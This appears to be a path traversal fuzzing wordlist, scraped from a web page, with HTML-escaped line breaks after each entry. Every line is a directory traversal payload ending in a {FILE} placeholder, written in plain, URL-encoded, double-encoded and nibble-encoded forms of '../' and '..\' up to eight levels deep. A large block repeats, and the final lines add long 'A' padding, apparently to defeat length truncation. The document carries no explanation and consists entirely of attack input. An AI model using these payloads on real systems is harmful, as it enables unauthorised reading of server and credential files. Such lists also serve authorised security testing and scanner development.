%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
